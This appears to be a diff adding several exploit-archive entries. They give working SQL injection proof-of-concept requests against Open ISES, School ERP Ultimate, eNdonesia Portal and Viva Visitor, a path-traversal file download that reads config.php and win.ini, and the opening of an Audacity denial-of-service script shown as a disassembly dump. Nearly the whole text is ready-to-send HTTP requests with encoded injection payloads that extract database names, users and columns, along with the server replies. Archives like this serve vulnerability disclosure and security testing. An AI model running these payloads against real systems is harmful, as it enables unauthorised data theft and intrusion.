# Date: 2018-10-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://openises.sourceforge.net/
# Software Link: https://sourceforge.net/projects/openises/files/latest/download
# Version: 3.30A_050318
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/main.php
POST /[PATH]/main.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
frm_passwd=') anD (SELect 155 FroM(SELECT COunt(*),COncaT(conCAT(0x203a20,UseR(),DatABASE(),VErSIoN()),0x7e,(seleCT (elT(155=155,1))),0x496873616e2053656e63616e,floOR(RAnd(0)*2))x frOM INFormATION_SchEMA.PLugINS GroUP BY x)a) And ('Efe'='Efe
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 16:53:16 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/
Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 720
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/nearby.php?tick_lat=[SQL]&tick_lng=[SQL]
GET /[PATH]/nearby.php?tick_lat=1)%20anD%20EXTRactVALUE(112,conCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELect%20(ELT(112=112,1))),0x496873616e2053656e63616e))%20AND%20(66=66&tick_lng=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 16:59:14 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 930
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/ajax/form_post.php?id=[SQL]&ticket_id=[SQL]&q=1&function=editaction
GET /[PATH]/ajax/form_post.php?id=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe&ticket_id=1&q=1&function=editaction HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 17:10:13 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/
Content-Length: 1321
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 4)
# http://localhost/[PATH]/sever_graph.php?p1=[SQL]
GET /[PATH]/sever_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 17:26:55 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 931
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 5)
# http://localhost/[PATH]/inc_types_graph.php?p1=[SQL]
GET /[PATH]/inc_types_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 17:28:55 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 996
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 6)
# http://localhost/[PATH]/city_graph.php?p1=[SQL]
GET /[PATH]/city_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 17:30:23 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 927
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 7)
# http://localhost/[PATH]/add_facnote.php?ticket_id=[SQL]
GET /[PATH]/add_facnote.php?ticket_id=1+/*!00005ProcEDUre*/+/*!00005AnaLYSe*/+(extractvalue(0,/*!00005cONcat*/(0x27,0x3a,@@VErsion)),0)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 17:36:28 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/
Content-Length: 1642
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

34
exploits/php/webapps/45646.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: School ERP Ultimate 2018 - 'fid' SQL Injection
# Dork: N/A
# Date: 2018-10-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://freeschoolerp.com/
# Software Link: http://freeschoolerp.com/schoolerp_30Nov2017_free.zip
# Software Link: https://sourceforge.net/projects/free-school-management-system/files/latest/download
# Version: 2018
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/student_staff/?pid=54&action=staff_timetable&fid=[SQL]
GET /[PATH]/student_staff/?pid=54&action=staff_timetable&fid=-%31%20%75%6e%49%6f%4e%20%73%45%6c%45%63%74%20%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=nno01rkuj0ql0k1sb96uhg1va1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 00:11:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 68790
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

154
exploits/php/webapps/45654.txt Normal file
View file

@ -0,0 +1,154 @@
# Exploit Title: eNdonesia Portal 8.7 - 'artid' SQL Injection
# Dork: N/A
# Date: 2018-10-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/files/latest/download
# Version: 8.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/mod.php?mod=publisher&op=viewarticle&artid=[SQL]
GET /[PATH]/mod.php?mod=publisher&op=viewarticle&artid=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 01:04:32 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/mod.php?mod=publisher&op=viewcat&cid=[SQL]
GET /[PATH]/mod.php?mod=publisher&op=viewcat&cid=4%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 01:08:12 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7597
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/mod.php?mod=diskusi&op=viewdisk&did=[SQL]
GET /[PATH]/mod.php?mod=diskusi&op=viewdisk&did=4%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 01:12:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5777
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 4)
# http://localhost/[PATH]/mod.php?mod=galeri&op=view_album&cid=[SQL]
GET /[PATH]/mod.php?mod=galeri&op=view_album&cid=5%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 01:16:24 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4671
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 5)
# http://localhost/[PATH]/mod.php?mod=content&op=viewcontent&contid=[SQL]
GET /[PATH]/mod.php?mod=content&op=viewcontent&contid=11%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 01:19:14 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4644
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 6)
# http://localhost/[PATH]/mod.php?mod=content&op=viewcontent&contid=[SQL]
GET /[PATH]/mod.php?mod=about&op=viewabout&aboutid=1%27||(SELEct%20%27Efe%27%20FRom%20DUal%20WHERE%20113=113%20anD%20(SeleCT%20156%20FRom(SElecT%20CouNT(*),coNcaT(CONCat(0x203a20,USeR(),DatABAse(),verSIoN()),(SEleCT%20(Elt(156=156,1))),FLooR(RAnd(0)*2))x%20frOM%20InFORmaTION_SCHemA.PLugiNS%20GRouP%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 01:23:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

56
exploits/php/webapps/45655.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: The Open ISES Project 3.30A - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://openises.sourceforge.net/
# Software Link: https://sourceforge.net/projects/openises/files/latest/download
# Version: 3.30A_050318
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/ajax/download.php?filename=[FILE]&origname=&type=
GET /[PATH]/ajax/download.php?filename=../config.php&origname=&type= HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 17:20:09 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Disposition: attachment; filename="";
Content-Transfer-Encoding: binary
Pragma: public
Cache-Control: must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: {$filetype}
GET /[PATH]/ajax/download.php?filename=../../../../../Windows/win.ini&origname=&type= HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 17:23:53 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Disposition: attachment; filename="";
Content-Transfer-Encoding: binary
Pragma: public
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Length: 564
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: {$filetype}

90
exploits/php/webapps/45656.txt Normal file
View file

@ -0,0 +1,90 @@
# Exploit Title: Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection
# Dork: N/A
# Date: 2018-10-19
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://viva-visitor.sourceforge.io/
# Software Link: https://sourceforge.net/projects/viva-visitor/files/latest/download
# Version: 0.95.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/repeat_verify-n.php
# Post / fname=[SQL]
POST /[PATH]/repeat_verify-n.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 516
fname=%22%22%27%27%27%20UniON%20SelECt%20nuLL%2cnuLL%2cCoNCat((selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x))%2cnuLL%2cnuLL%2cnuLL%2cnuLL%2cnuLL%2cnuLL--%20Efe
HTTP/1.1 200 OK
Date: Fri, 19 Oct 2018 20:58:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3175
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/repeat_verify-n.php
# Post / lname=[SQL]
POST /[PATH]/repeat_verify-n.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
lname=%'%20anD%20(SELecT%20112%20FRom(SelECT%20COunT(*),COncAT(version(),(SElecT%20(Elt(112=112,1))),dataBAse(),FLooR(RAnD(0)*2))x%20FroM%20INforMATIon_SCheMA.PluGINS%20GRouP%20By%20x)a)%20AnD'%'='
HTTP/1.1 200 OK
Date: Fri, 19 Oct 2018 21:03:13 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 817
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/repeat_verify.php?me=[SQL]
GET /[PATH]/repeat_verify.php?me=1%20UNION%20SeLECt%20NuLl%2cNuLl%2cCOnCaT((selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x))%2cNuLl%2cNuLl%2cNuLl%2cNuLl%2cNuLl%2cNuLl--%20Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 19 Oct 2018 21:13:06 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2714
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

98
exploits/windows/dos/45644.pl Executable file
View file

@ -0,0 +1,98 @@
# Exploit Title: AudaCity 2.3 - Denial of Service (PoC)
# Author: Kağan Çapar
# Discovery Date: 2018-10-19
# Software Link: https://www.fosshub.com/Audacity.html
# Vendor Homepage : https://www.audacityteam.org
# Tested Version: 2.3
# Tested on OS: Windows 10 x64/86 (Normal use CPU) & Windows 7 (High CPU usage) & Windows XP (High CPU usage)
# other version should be affected
# Steps to Reproduce: Run the perl exploit script, it will create a new
# file with the name "lock.wav". Open Audatcity.exe
# Go to File > Open > Import > Select "lock.wav file"
# you will see a locking on software.
# ! /usr/bin/perl
# Dump of assembler code for function data:
# 0x0000000000004040 <+0>: push %rdx
# 0x0000000000004041 <+1>: rex.WB
# 0x0000000000004042 <+2>: rex.RX
# 0x0000000000004043 <+3>: rex.RX retq $0x158
# 0x0000000000004047 <+7>: add %dl,0x41(%rdi)
# 0x000000000000404a <+10>: push %rsi
# 0x000000000000404b <+11>: rex.RB
# 0x000000000000404c <+12>: rex.R
# 0x000000000000404d <+13>: rex.R
# 0x000000000000404e <+14>: rex.R
# 0x000000000000404f <+15>: rex.R clc
# 0x0000000000004051 <+17>: (bad)
# 0x0000000000004052 <+18>: (bad)
# 0x0000000000004053 <+19>: incl (%rcx)
# 0x0000000000004055 <+21>: add %al,(%rcx)
# 0x0000000000004057 <+23>: add %ah,(%rdx)
# 0x0000000000004059 <+25>: push %rsi
# 0x000000000000405a <+26>: add %al,(%rax)
# 0x000000000000405c <+28>: rex.R lods %ds:(%rsi),%al
# 0x000000000000405e <+30>: add %al,(%rax)
# 0x0000000000004060 <+32>: add (%rax),%al
# 0x0000000000004062 <+34>: adc %al,(%rax)
# 0x0000000000004064 <+36>: add %al,(%rax)
# 0x0000000000004066 <+38>: data16 (bad)
# 0x0000000000004068 <+40>: movslq 0x0(%rsp,%rax,1),%esi
# 0x000000000000406c <+44>: add %al,(%rax)
